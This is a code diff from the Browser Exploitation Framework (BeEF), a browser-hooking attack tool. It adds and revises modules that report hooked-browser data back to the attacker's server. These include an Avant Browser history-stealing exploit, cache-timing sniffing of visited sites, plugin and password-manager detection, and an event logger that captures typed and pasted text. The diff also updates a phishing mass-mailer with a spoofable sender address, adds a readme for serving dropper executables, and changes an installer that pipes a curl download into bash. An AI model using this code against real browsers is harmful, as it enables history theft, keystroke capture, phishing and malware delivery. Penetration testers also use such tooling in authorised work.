@@ -299,7 +299,10 @@ class ShellInterface
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'], 
         ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit',              'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -308,7 +311,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Hook Host',     'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host
@@ -326,22 +329,22 @@ class ShellInterface
 
       case p[2]
         when "BrowserName"
-          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
 
         when "ScreenSize"
-          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = screen_size_hash['width']
           height = screen_size_hash['height']
           cdepth = screen_size_hash['colordepth']
           data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
 
         when "WindowSize"
-          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = window_size_hash['width']
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2])
+          data   = BD.get(self.targetsession, p[2])
       end
 
       # add property to summary hash

extensions/demos/html/basic.html

@@ -1,10 +1,10 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html>
 <!--
     Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html>
 <head>
 	<title>BeEF Basic Demo</title>
 	<script>
@@ -19,7 +19,6 @@
 		Have fun while your browser is working against you.
 	</p>
 		
-	<p>
 		These links are for demonstrating the "Get Page HREFs" command module<br />
 	<ul>
 	
@@ -28,7 +27,6 @@
 	<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
 
 	</ul>
-	</p>
 
     <p>Have a go at the event logger.<br />
     <label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p>

extensions/evasion/obfuscation/minify.rb

@@ -6,7 +6,7 @@
 module BeEF
   module Extension
     module Evasion
-      require 'jsmin'
+      require 'uglifier'
       class Minify
         include Singleton
 
@@ -15,7 +15,7 @@ module BeEF
         end
 
         def execute(input, config)
-          input = JSMin.minify(input)
+          input = Uglifier.compile(input)
           print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"
           input
         end

extensions/events/handler.rb

@@ -52,7 +52,7 @@ module Events
         when 'click'
           result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
         when 'focus'
-          result = "#{event['time']}s - [Focus] Browser has regained focus."
+          result = "#{event['time']}s - [Focus] Browser window has regained focus."
         when 'copy'
           result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
         when 'cut'
@@ -60,7 +60,7 @@ module Events
         when 'paste'
           result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
         when 'blur'
-          result = "#{event['time']}s - [Blur] Browser has lost focus."
+          result = "#{event['time']}s - [Blur] Browser window has lost focus."
         when 'keys'
           result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
         when 'submit'

extensions/metasploit/config.yaml

@@ -33,6 +33,9 @@ beef:
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
+              {os: 'kali', path: '/usr/share/metasploit-framework/'},
+              #{os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
+              {os: 'pentoo', path: '/usr/lib/metasploit'},
               {os: 'win', path: 'c:\\metasploit-framework\\'},
               {os: 'custom', path: ''}
             ]

extensions/social_engineering/config.yaml

@@ -21,7 +21,7 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "youruser@gmail.com"
+                auth: "youruser@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:

extensions/social_engineering/droppers/readme.txt

@@ -0,0 +1,9 @@
+This directory will contain the droppers (executables, JARs, browser extensions, etc..)
+that you want to have available on the BeEF server.
+
+For example, if you want to have bin.exe available at http://beefserver/bin.exe,
+use the following RESTful API call:
+
+curl -H "Content-Type: application/json; charset=UTF-8" -d
+'{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}'
+ -X POST http://beefserver/api/server/bind?token=<token>

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -20,14 +20,14 @@ module BeEF
           @host = @config.get("#{@config_prefix}.host")
           @port = @config.get("#{@config_prefix}.port")
           @helo = @config.get("#{@config_prefix}.helo")
-          @from = @config.get("#{@config_prefix}.from")
+          @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, fromname, subject, link, linktext, tos_hash)
+        def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
           print_info "subject: #{subject}"
           print_info "link: #{link}"
           print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
 
           if @config.get("#{@config_prefix}.use_auth")
-            smtp.start(@helo, @from, @password, :login) do |smtp|
+            smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
             end
           else
-            smtp.start(@helo, @from) do |smtp|
+            smtp.start(@helo) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
@@ -67,33 +67,39 @@ module BeEF
           end
         end
 
-        def compose_email(fromname, to, name, subject, link, linktext, template)
-           msg_id = random_string(50)
-           boundary = "------------#{random_string(24)}"
-           rel_boundary = "------------#{random_string(24)}"
+        def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+          begin
+            msg_id = random_string(50)
+            boundary = "------------#{random_string(24)}"
+            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
-           rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           images = ""
-           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
-             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
-           end
+            header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
+            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+            rel_header = email_related(rel_boundary)
+            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           attachments = ""
-           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
-             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
-               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
-             end
-           end
+            images = ""
+            @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+            end
 
-           close = email_close(boundary)
+            attachments = ""
+            if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+              @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+                 attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+              end
+            end
 
-           message = header + plain_body + rel_header + html_body + images + attachments + close
-           print_debug "Raw Email content:\n #{message}"
-           message
+            close = email_close(boundary)
+          rescue Exception => e
+            print_error "Error constructing email."
+            raise
+          end
+
+          message = header + plain_body + rel_header + html_body + images + attachments + close
+          print_debug "Raw Email content:\n #{message}"
+          message
         end
 
         def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

extensions/social_engineering/rest/socialengineering.rb

@@ -70,6 +70,7 @@ module BeEF
         #    "template": "default",
         #    "subject": "Hi from BeEF",
         #    "fromname": "BeEF",
+        #    "fromaddr": "beef@beef.com",
         #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
         #    "linktext": "http://beefproject.com",
         #    "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
             template = body["template"]
             subject = body["subject"]
             fromname = body["fromname"]
+            fromaddr = body["fromaddr"]
             link = body["link"]
             linktext = body["linktext"]
 
-            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+            if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
               print_error "All parameters are mandatory."
               halt 401
             end
@@ -106,11 +108,16 @@ module BeEF
                 halt 401
               end
             end
-
-          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
           rescue Exception => e
-            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+            error 400
+          end
+
+          begin
+            mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+            mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid mailer configuration"
             error 400
           end
         end

install-beef

@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

liveCD/BeEFLive.sh

@@ -9,8 +9,8 @@
 #
 # This is the auto startup script for the BeEF Live CD. 
 # IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
-# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
+# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso
+# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c
 #
 # This script contains a few fixes to make BeEF play nicely with the way  
 # remastersys creates the live cd distributable as well as generating host keys 
@@ -117,6 +117,8 @@ show_menu() {
 		f1="/etc/ssh/ssh_host_rsa_key"
 		if [ -f $f1 ] ; then
 			echo "[1] Disable SSH                              [Currently Enabled]"
+			echo -ne "                                             beef@"
+			ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }'
 		else 
 			echo "[1] Enable SSH                               [Currently Disabled]"
 		fi
@@ -187,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
 		#

liveCD/isolinux.txt

@@ -0,0 +1,34 @@
+default vesamenu.c32
+prompt 0
+timeout 100
+
+menu title BeEF Live CD
+menu background splash.png
+menu color title 1;37;44 #c0ffffff #00000000 std
+
+label live
+  menu label live - BeEF Beef Live
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash --
+
+label xforcevesa
+  menu label xforcevesa - boot Live in safe graphics mode
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash --
+
+label install
+  menu label install - start the installer directly
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash --
+
+label memtest
+  menu label memtest - Run memtest
+  kernel /install/memtest
+  append -
+
+label hd
+  menu label hd - boot the first hard disk
+  localboot 0x80
+  append -
+
+

modules/browser/avant_steal_history/command.js

@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 

modules/browser/avant_steal_history/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

modules/browser/browser_fingerprinting/command.js

@@ -34,6 +34,10 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
 		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

modules/browser/detect_foxit/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
+
+});
+

modules/browser/detect_foxit/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_foxit:
+            enable: true
+            category: "Browser"
+            name: "Detect Foxit Reader"
+            description: "This module will check if the browser has Foxit Reader Plugin."
+            authors: ["javuto"]
+            target:
+                working: ["All"]

modules/browser/detect_foxit/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_foxit < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['foxit'] = @datastore['foxit']
+		save content
+	end
+
+end

modules/browser/detect_lastpass/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+

modules/browser/detect_lastpass/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]

modules/browser/detect_lastpass/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

modules/browser/detect_office/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+

modules/browser/detect_office/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]

modules/browser/detect_office/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

modules/browser/detect_unity/command.js

@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	
+	var hasUnity = function() {
+		
+		// Internet Explorer
+		if ( beef.browser.isIE() ) {
+			
+			try {
+					var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
+				} catch (e) { }
+				
+			if ( unity_test ) {
+				return true;
+			}
+		
+		// Not Internet Explorer	
+		} else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) {
+			
+			if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
+	            navigator.plugins &&
+				navigator.plugins["Unity Player"] ) {
+
+				return true;
+
+				}
+			
+		}
+		
+		return false;		
+	
+	}
+	
+	
+	
+	if ( hasUnity() ) {
+		
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
+		
+		if ( !beef.browser.isIE() ) {
+			
+			var unityRegex = /Unity Web Player version (.*). \(c\)/g;
+			var match = unityRegex.exec(navigator.plugins["Unity Player"].description);
+			
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]);
+			
+		}
+		
+	} else {
+		
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled");
+	
+	}
+	
+});

modules/browser/detect_unity/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Detect_unity:
+            enable: true
+            category: "Browser"
+            name: "Detect Unity Web Player"
+            description: "Detects Unity Web Player."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]

modules/browser/detect_unity/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_unity < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['unity'] = @datastore['unity']
+    save content
+  end
+
+end

modules/browser/detect_wmp/command.js

@@ -0,0 +1,13 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasWMP() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "wmp="+result);
+
+});

modules/browser/detect_wmp/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_wmp:
+            enable: true
+            category: "Browser"
+            name: "Detect Windows Media Player"
+            description: "This module will check if the browser has the Windows Media Player plugin installed."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]

modules/browser/detect_wmp/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_wmp < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['wmp'] = @datastore['wmp']
+		save content
+	end
+
+end

modules/browser/get_visited_domains/command.js

@@ -16,6 +16,8 @@ var tries = 0;
 
 var isIE = 0;
 var isFF = 0;
+var isO = 0;
+var isC = 0;
 
 /*******************************
  * SUB-MS TIMER IMPLEMENTATION *
@@ -131,6 +133,56 @@ if (beef.browser.isIE() == 1) {
 	var MAX_ATTEMPTS = 1;	
 }
 
+if (beef.browser.isO() == 1){
+    /****************
+	 * SCANNED URLS *
+	 ****************/
+	var targets = [
+	  { 'category': 'Social networks' },
+	  { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
+	  { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
+	
+	  { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
+									 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
+	  { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
+	  { 'category': 'Content platforms' },
+	  { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
+	  { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
+	  { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
+	  { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
+	  { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
+	  { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
+	  { 'category': 'Online media' },
+	  { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
+	  { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
+								 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
+	  { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
+	  { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
+	  { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
